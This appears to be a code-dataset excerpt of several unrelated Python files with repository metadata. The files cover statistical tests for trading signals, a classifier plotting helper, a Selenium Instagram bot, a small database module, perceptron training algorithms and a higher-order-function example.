:param rtn_type: definition of return types
'log': logarithmic returns
'mean': arithmetic returns
    :return: hp, the holding period that was tested
"""
ls_ix_signal = signal.index.tolist()
ls_ix_signal_nan = [i for i in ls_ix_signal if i not in signal.dropna().index.tolist()]
rtn = (ys.shift(hp) / ys).apply(np.log)
rtn.loc[ls_ix_signal_nan] = np.nan
rtn_signal = rtn.copy()
rtn_signal.loc[signal.where(signal == 0).dropna().index.tolist()] = np.nan
rtn_signal.loc[signal.where(signal == 1).dropna().index.tolist()] *= 1
rtn_signal.loc[signal.where(signal == -1).dropna().index.tolist()] *= -1
rtn_signal.loc[ls_ix_signal_nan] = np.nan
rtn_signal.dropna(inplace=True)
rtn.dropna(inplace=True)
print('Null Hypothesis: rtn_signal = rtn')
print('Alternative Hypothesis: rtn_signal > rtn')
mean_signal, mean_market = rtn_signal.mean(), rtn.mean()
std_signal, std_market = rtn_signal.std(ddof=1), rtn.std(ddof=1)
n_signal, n_market = rtn_signal.size, rtn.size
df = n_signal + n_market - 2
sed = np.sqrt(((n_signal-1)*std_signal**2 + (n_market-1)*std_market**2)/df)
t_stat = (mean_signal - mean_market) / (sed * np.sqrt(1/n_signal + 1/n_market))
# Critical t-value: one-tailed
one_tailed_alpha = [0.1, 0.05, 0.01]
print('-' * 40)
print('Calculated t_stats is {}.\nWith df = {}'.format(t_stat, df))
for alpha in one_tailed_alpha:
c_t = stats.t.ppf(1 - alpha, df=df)
if t_stat > c_t:
print('Reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
print('Good to go with fixed {} holding period'.format(hp))
else:
print('We failed to reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
return hp
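# Usage sketch with synthetic data (names and numbers are illustrative only):
# >>> import numpy as np, pandas as pd
# >>> prices = pd.Series(np.exp(np.cumsum(np.random.normal(0, 0.01, 500))))
# >>> sig = pd.Series(np.random.choice([1, 0, -1], size=500), index=prices.index)
# >>> pair_test(prices, sig, hp=5)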
def Bernoulli_trials(x, N, p=0.5):
"""
p: probability of success: 50%
N: number of trials (different assets)
x: number of successful cases
(where trading rule generates positive profits)
"""
# mean: p*N
# sigma: (N*p*(1-p))**(1/2)
z_stat = (x-p*N) / (N*p*(1-p))**(1/2)
print('Null Hypothesis: x = p*N')
    print('Alternative Hypothesis: x > p*N')
# Critical z-value: one-tailed
one_tailed_alpha = [0.1, 0.05, 0.01]
print('-' * 40)
print('Calculated z_stats is {}.'.format(z_stat))
for alpha in one_tailed_alpha:
c_t = stats.norm.ppf(1 - alpha)
if z_stat > c_t:
print('Reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
print('Good to go with the strategy.')
else:
print('We failed to reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
pval = stats.norm.sf(z_stat)
return pval
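# e.g. a rule that is profitable on 60 of 100 assets under H0 p = 0.5:
# >>> Bernoulli_trials(x=60, N=100)   # z = (60 - 50) / sqrt(25) = 2.0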
def Bootstrap_Approach(ys):
# TODO: check the normality of rtn
log_return = (ys / ys.shift(1)).apply(np.log)
mean = log_return.mean()
std_dev = log_return.std()
###########################################################################
# Calculate sample bias-corrected skewness
N = log_return.size
g1 = (((log_return - mean) ** 3).sum() / N) / (((((log_return - mean) ** 2).sum()) / N) ** (3 / 2))
G1 = (N * (N - 1)) ** 0.5 * g1 / (N - 2)
# Significance test of skewness
SES = (6*N*(N-1) / ((N-2)*(N+1)*(N+3)))**0.5
# H0: G1 = 0
# H1: G1 != 0
ZG1 = G1 / SES
print('Null Hypothesis: G1 = 0')
print('Alternative Hypothesis: G1 != 0')
# Critical z-value: two-tailed
two_tailed_alpha = [0.05, 0.01]
print('-' * 40)
print('Calculated z_stats is {}.'.format(ZG1))
for alpha in two_tailed_alpha:
c_t = stats.norm.ppf(1 - alpha / 2)
if ZG1 > c_t:
print('Reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
else:
print('We failed to reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
G1_p = stats.norm.sf(ZG1)
# Calculate sample bias-corrected kurtosis
N = log_return.size
g2 = (((log_return - mean) ** 4).sum() / N) / (((((log_return - mean) ** 2).sum()) / N) ** 2)
G2 = (N - 1)/((N-2)*(N-3)) *((N+1)*g2-3*(N-1))+3
# Significance test of kurtosis
SEK = 2*SES*((N**2-1)/((N-3)*(N+5)))**0.5
# H0: G2 = 3
# H1: G2 != 3
ZG2 = (G2-3) / SEK
print('Null Hypothesis: G2 = 3')
print('Alternative Hypothesis: G2 != 3')
# Critical z-value: two-tailed
two_tailed_alpha = [0.05, 0.01]
print('-' * 40)
print('Calculated z_stats is {}.'.format(ZG2))
for alpha in two_tailed_alpha:
c_t = stats.norm.ppf(1 - alpha / 2)
if ZG2 > c_t:
print('Reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
else:
print('We failed to reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
G2_p = stats.norm.sf(ZG2)
###########################################################################
G1 = stats.skew(log_return.dropna())
(ZG1, G1_p) = stats.skewtest(log_return.dropna())
G2 = stats.kurtosis(log_return.dropna())
(ZG2, G2_p) = stats.kurtosistest(log_return.dropna())
(ZKS, KS_p) = stats.kstest(log_return.dropna(), 'norm')
dict_stats = {
'Mean': mean,
'Std': std_dev,
'Skewness': {
'value': G1,
'p_value': G1_p
},
'Kurtosis': {
'value': G2,
'p_value': G2_p
},
'KS_stat': {
'value': ZKS,
'p_value': KS_p
}
}
return dict_stats
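# Usage sketch: feed a price series and inspect the normality diagnostics:
# >>> stats_dict = Bootstrap_Approach(ys)
# >>> stats_dict['Skewness']['p_value'], stats_dict['KS_stat']['p_value']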
# Assessing the Performance of Predicting Returns
if __name__ == '__main__':
df_ys = pd.read_csv('./Data/ru_i_15min.csv')
# df_ys = pd.read_csv('./Data/IF1903_1min.csv')
df_ys.datetime = df_ys.datetime.apply(pd.to_datetime)
df_ys.datetime = df_ys.datetime.apply(lambda x: str(x))
df_ys.set_index('datetime', inplace=True)
ls_cols = df_ys.columns.tolist()
str_Close = [i for i in ls_cols if i[-6:] == '.close'][0]
ys = df_ys.loc[:, str_Close]
ys = ys[-300:]
| [
"[email protected]"
] | |
8f375307e59ae9ff7ea9e2e6b1ef4ab6b09bd545 | 1d5ee66a920a218f2816fbb1f501e4f2f3f88948 | /class_vis.py | 3d48696ea23458d55eda97e93f84d193ee8182cf | [] | no_license | weschurch/ud120 | 5ba3852c1a8bd1e61f6578f0433fc97311bfeeb2 | 67a15e2d8315a33eb79bfcb9464b01b41bc5af3a | refs/heads/master | 2021-06-11T12:23:29.405751 | 2017-02-06T03:14:01 | 2017-02-06T03:14:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,800 | py | #!/usr/bin/python
#from udacityplots import *
import warnings
warnings.filterwarnings("ignore")
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import pylab as pl
import numpy as np
#import numpy as np
#import matplotlib.pyplot as plt
#plt.ioff()
def prettyPicture(clf, X_test, y_test):
x_min = 0.0; x_max = 1.0
y_min = 0.0; y_max = 1.0
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
h = .01 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.pcolormesh(xx, yy, Z, cmap=pl.cm.seismic)
# Plot also the test points
grade_sig = [X_test[ii][0] for ii in range(0, len(X_test)) if y_test[ii]==0]
bumpy_sig = [X_test[ii][1] for ii in range(0, len(X_test)) if y_test[ii]==0]
grade_bkg = [X_test[ii][0] for ii in range(0, len(X_test)) if y_test[ii]==1]
bumpy_bkg = [X_test[ii][1] for ii in range(0, len(X_test)) if y_test[ii]==1]
plt.scatter(grade_sig, bumpy_sig, color = "b", label="fast")
plt.scatter(grade_bkg, bumpy_bkg, color = "r", label="slow")
plt.legend()
plt.xlabel("bumpiness")
plt.ylabel("grade")
plt.savefig("result.png")
import base64
import json
import subprocess
def output_image(name, format, bytes):
image_start = "BEGIN_IMAGE_f9825uweof8jw9fj4r8"
image_end = "END_IMAGE_0238jfw08fjsiufhw8frs"
data = {}
data['name'] = name
data['format'] = format
data['bytes'] = base64.encodestring(bytes)
print image_start+json.dumps(data)+image_end | [
"[email protected]"
] | |
efa07210ff6f08245e4804bed6abdae003e850bc | 912ab3a9f3d44a025e48ef2e01af968e980e15a8 | /main.py | 6f116d84b453d0eb80c0b769fb4d370264fd8ff5 | [] | no_license | asutd/youtubecomments | c9b36852baa0c7f04413c53da0a503038812cb40 | ff6813801d7146ef6da454f948783d3b8f6079ae | refs/heads/master | 2022-07-27T17:02:41.769654 | 2020-05-16T22:55:07 | 2020-05-16T22:55:07 | 258,897,598 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,286 | py | #main.py
from selenium import webdriver
from time import sleep
from secrets import pw
from secrets import login
class InstaBot:
def __init__(self, username, pw):
print("init")
self.username = username
self.driver = webdriver.Chrome()
self.driver.get("https://www.instagram.com/accounts/login/")
sleep(1.618)
self.driver.find_element_by_xpath("//input[@name=\"username\"]")\
.send_keys(username)
sleep(1.618)
self.driver.find_element_by_xpath("//input[@name=\"password\"]")\
.send_keys(pw)
sleep(1.618)
self.driver.find_element_by_xpath('//button[@type="submit"]')\
.click()
sleep(3)
self.driver.find_element_by_xpath("//button[contains(text(), 'Not Now')]")\
.click()
sleep(2)
def getUnfollowers(self):
print("starting getUnfollowers")
self.driver.find_element_by_xpath("//a[contains(@href,'/{}')]".format(self.username))\
.click()
sleep(2)
self.driver.find_element_by_xpath("//a[contains(@href,'/following')]")\
.click()
sleep(2)
        sugs = self.driver.find_element_by_xpath("//h4[contains(text(), 'Suggestions')]")  # 'Suggestions' heading text is an assumption
bot = InstaBot(login, pw)
bot.getUnfollowers()
| [
"[email protected]"
] | |
87104cbaa2ce1c05efb37c6933faa6a5e6390573 | bb62f7d2043e22721a9abaaf9424d6fbb87862f2 | /storage/fase2/team02/storage/DictMode/modulo_bd.py | c861be063e2be773bda689a4bed44ac0b015175f | [
"MIT"
] | permissive | sandymerida/tytus | 7499fb306321f7563b773a8c6dda2cb5e46bb819 | a26c9a0ad55a36c7579dfd8f457eeff8b1a39186 | refs/heads/main | 2023-02-17T15:02:55.143120 | 2021-01-09T20:22:55 | 2021-01-09T20:22:55 | 320,125,119 | 1 | 0 | MIT | 2020-12-10T01:28:12 | 2020-12-10T01:28:11 | null | UTF-8 | Python | false | false | 912 | py | # License: Released under MIT License
# Notice: Copyright (c) 2020 TytusDB Team
# Developer: Andree Avalos
from storage.DictMode.singleton import existDB, insertDB, alterDB, dropDB, showDB, dropAll
def createDatabase(database: str):
try:
if existDB(database):
return 2
return insertDB(database)
except:
return 1
def alterDatabase(databaseOld, databaseNew):
try:
if not existDB(databaseOld):
return 2
if existDB(databaseNew):
return 3
return alterDB(databaseOld, databaseNew)
except:
return 1
def dropDatabase(database:str):
try:
if not existDB(database):
return 2
return dropDB(database)
except:
return 1
def showDatabases():
try:
return showDB()
except:
return 1
| [
"[email protected]"
] | |
b7d4bf416177c3cf97113ed4ad53ad3f3c2941a0 | beb638f3422f9465a7fd1d2e95958a9f87f09995 | /offline1/1505071.py | a9c8176af5243cfe0031f60dbd0fec470aaa0875 | [] | no_license | Mritunjoy71/CSE_474-Pattern-Recognition-Sessional | 8604e1e84f4c8279a2fa2c7d093313895c5a36d1 | b3d62abb7b4093b05ead7c82ace6f724b1a0654b | refs/heads/master | 2023-02-19T20:44:40.079396 | 2021-01-21T21:23:46 | 2021-01-21T21:23:46 | 331,758,434 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,365 | py | import numpy as np
input_file = open("trainLinearlySeparable.txt")
input_lines = input_file.readlines()
d_feature = 0
m_class = 0
n_samples = 0
train_LS = []
line_count = 0
for line in input_lines:
if line_count == 0:
L = line.split()
d_feature = int(L[0])
m_class = int(L[1])
n_samples = int(L[2])
#print(L)
else:
L = line.split()
line_data = []
for i in range(d_feature):
line_data.append(float(L[i]))
line_data.append(int(L[d_feature]))
#print(line_data)
train_LS.append(line_data)
line_count = line_count + 1
input_file = open("testLinearlySeparable.txt")
input_lines = input_file.readlines()
test_LS = []
line_count = 0
for line in input_lines:
L = line.split()
line_data = []
for i in range(d_feature):
line_data.append(float(L[i]))
line_data.append(int(L[d_feature]))
#print(line_data)
test_LS.append(line_data)
#__________Reward and Punishment Algorithm_________#
print("\nReward and punishment algorithm\n")
max_iteration = 1000
np.random.seed(41)
t = 0
row_not = 0.027
W = np.random.uniform(-10, 10, d_feature + 1)
print("Initial weight",W)
for itr in range(max_iteration):
count = 0
for train_data in train_LS:
class_no = train_data[-1]
X = train_data[:-1]
X.append(1)
t_data = np.array(X)
#print(X)
X =np.array(X).reshape(-1, 1)
#print(X)
mult = np.dot(W, X)[0]
#print(mult)
if mult <= 0 and class_no == 1:
W = W + row_not * np.array(t_data)
count = count + 1
elif mult > 0 and class_no == 2:
W = W - row_not * np.array(t_data)
count = count + 1
else:
pass
if count == 0:
break
print("Final weight",W)
def Testdata(test_data,weight):
accuracy_count=0
for d in test_data:
X=np.array(d)
no_class=X[d_feature]
X[d_feature]=1
X=X.reshape(d_feature+1,1)
mult=np.dot(weight,X)[0]
class_predicted=0
if mult>=0:
class_predicted=1
else:
class_predicted=2
if class_predicted==no_class:
accuracy_count=accuracy_count+1
print("Accuracy is ",float((accuracy_count/len(test_data))*100))
return float(accuracy_count)
Testdata(test_LS,W)
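# Worked micro-example of the reward/punishment update above (illustrative
# numbers): with W = [1.0, -2.0, 0.5] and sample x = [0.3, 0.7, 1] (bias
# appended) of true class 1, W.x = 0.3 - 1.4 + 0.5 = -0.6 <= 0, so the
# sample is misclassified and W <- W + row_not * x.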
#_____________BASIC PERCEPTRON ALGORITHM_______________#
print("\n\nBasic perceptron Algorithm\n")
max_iteration = 1000
np.random.seed(41)
t = 0
row_not = 0.027
W = np.random.uniform(-10, 10, d_feature + 1)
print("Initial weight",W)
for itr in range(max_iteration):
del_x=[]
Y=[]
for train_data in train_LS:
X = np.array(train_data)
#print(X)
class_no = X[d_feature]
X[d_feature] = 1
X = X.reshape(d_feature + 1, 1)
#print(X)
mult = np.dot(W, X)[0]
#print(mult)
if mult < 0 and class_no == 1:
Y.append(X)
del_x.append(-1)
elif mult > 0 and class_no == 2:
Y.append(X)
del_x.append(1)
else:
pass
summation = np.zeros(d_feature+1)
for j in range(len(Y)):
summation =summation+ del_x[j]*Y[j].transpose()[0]
W = W - row_not*summation
if len(Y) == 0:
break
print("Final weight",W)
Testdata(test_LS,W)
#__________Pocket Algorithm__________#
print("\n\nPocket algorithm\n")
input_file = open("trainLinearlyNonSeparable.txt")
input_lines = input_file.readlines()
train_NLS = []
line_count = 0
for line in input_lines:
if line_count == 0:
L = line.split()
d_feature = int(L[0])
m_class = int(L[1])
n_samples = int(L[2])
#print(L)
else:
L = line.split()
line_data = []
for i in range(d_feature):
line_data.append(float(L[i]))
line_data.append(int(L[d_feature]))
#print(line_data)
train_NLS.append(line_data)
line_count = line_count + 1
input_file = open("testLinearlyNonSeparable.txt")
input_lines = input_file.readlines()
test_NLS = []
line_count = 0
for line in input_lines:
L = line.split()
line_data = []
for i in range(d_feature):
line_data.append(float(L[i]))
line_data.append(int(L[d_feature]))
#print(line_data)
test_NLS.append(line_data)
np.random.seed(41)
t = 0
row_not = 0.027
W = np.random.uniform(-10, 10, d_feature + 1)
print("Initial weight",W)
Wp = W
M = len(train_NLS)  # upper bound on training misclassifications for the pocket comparison
for itr in range(max_iteration):
del_x=[]
Y=[]
count=0
    for train_data in train_NLS:
X = np.array(train_data)
#print(X)
class_no = X[d_feature]
X[d_feature] = 1
X = X.reshape(d_feature + 1, 1)
#print(X)
mult = np.dot(W, X)[0]
#print(mult)
if mult < 0 and class_no == 1:
Y.append(X)
del_x.append(-1)
count=count+1
elif mult > 0 and class_no == 2:
Y.append(X)
del_x.append(1)
count=count+1
else:
pass
summation = np.zeros(d_feature+1)
for j in range(len(Y)):
summation =summation+ del_x[j]*Y[j].transpose()[0]
W = W - row_not*summation
if count<M:
M=count
Wp=W
if count == 0:
break
print("Final weight",Wp)
Testdata(test_NLS,Wp)
| [
"[email protected]"
] | |
5ffa1358609b67c52360b1bab4f76c8dc2094062 | 9c18ba32a6d927cf12b79f8ac96a1a2918e5564e | /funciones1nivelReturn.py | 2db532de9bcfd97b53c5b8bc5d36166c9daccad0 | [] | no_license | formesdesign/m02_bootcamp | e96105d276fc67e885ca7df85232594a57d8ab7a | 7b0e7f3f04dca9fcd44057d8cb514f3b8fe77d73 | refs/heads/main | 2022-12-29T01:46:36.239357 | 2020-10-17T10:59:36 | 2020-10-17T10:59:36 | 303,087,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | #*l elemtos d'una rai
def maxi(*l):
if len(l) ==0:
return 0
m = l[0]
for ix in range(1, len(l)):
if l[ix] > m:
m = l[ix]
return m
def mini(*l):
if len(l) ==0:
return 0
m = l[0]
for ix in range(1, len(l)):
if l[ix] < m:
m = l[ix]
return m
def media(*l):
if len(l) ==0:
return 0
suma = 0
for valor in l:
suma += valor
return suma / len(l)
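# Quick sanity checks (illustrative):
# >>> maxi(3, 9, 4)    # -> 9
# >>> mini(3, 9, 4)    # -> 3
# >>> media(3, 9, 4)   # -> 5.333...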
#dictionary + create a first-level (higher-order) function
#this function returns whichever of the functions above we ask for
funciones = {
"max": maxi,
"min": mini,
"med": media
}
def returnF(nombre):
nombre = nombre.lower()
if nombre in funciones.keys():
return funciones[nombre]
return None | [
"[email protected]"
] |